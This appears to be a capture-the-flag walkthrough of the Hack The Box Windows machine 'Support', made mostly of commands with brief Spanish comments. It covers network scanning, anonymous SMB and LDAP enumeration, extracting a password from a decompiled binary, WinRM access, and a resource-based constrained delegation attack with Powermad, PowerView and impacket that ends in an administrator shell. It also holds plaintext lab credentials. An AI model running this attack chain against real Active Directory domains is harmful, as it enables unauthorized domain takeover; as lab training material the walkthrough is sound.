Support

Support


HTB Windows

nmap -A -p- -oA support 10.129.230.181 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA support 10.129.230.181

echo "10.129.230.181 dc01.support.htb support.htb nats-svc.support.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA support-udp 10.129.230.181

ping -c 1 10.129.230.181


nmap -p- --open -T5 -v -n support 10.129.230.181

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn support 10.129.230.181 -oG allPorts


extractPorts allPorts


nmap -sCV -p553,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.129.230.181 -oN targeted


bc targeted -l rb


ldapsearch -H ldap://10.129.230.181 -x -s base namingcontexts


ldapsearch -x -H ldap://10.129.230.181 -b 'DC=support,DC=htb'


nxc smb 10.129.230.181 -u 'anonymous' -p '' --rid-brute 3000


smbclient -N //support.htb/support-tools


mget *


unzip UserInfo.exe.zip

Abrimos dnSpy y cargamos el archivo UserInfo.exe.


Encontramos la siguiente contraseña y la desencriptamos.


bh --domain support.htb --username 'ldap' --password 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --kerberos --nameserver 10.129.230.181 --dns-tcp --collection ALL --zip


Iniciamos BloodHound:

docker-compose -f bloodhound.yml up


nxc smb 10.129.230.181 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'


ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap


bc ldap/domain_users.json| grep -i 'Ironside'


nxc winrm 10.129.230.181 -u 'support' -p 'Ironside47pleasure40Watchful'

evil-winrm -i 10.129.230.181 -u 'support' -p 'Ironside47pleasure40Watchful'


whoami

net user support


net group


upload Powermad.ps1

upload PowerView.ps1

Import-Module .\Powermad.ps1

New-MachineAccount -MachineAccount MyFakePC -Password $(ConvertTo-SecureString 'P@ssword123' -AsPlainText -Force)

Import-Module .\PowerView.ps1

$Computersid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($Computersid ))"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}


https://github.com/cuerv0x/krb5Config

bc /etc/krb5.conf


impacket-getST -spn www/dc.support.htb -impersonate administrator -dc-ip 10.129.230.181 support.htb/MyFakePC$:P@ssword123


export KRB5CCNAME=Administrator@www_dc.support.htb@SUPPORT.HTB.ccache

impacket-psexec -k dc.support.htb

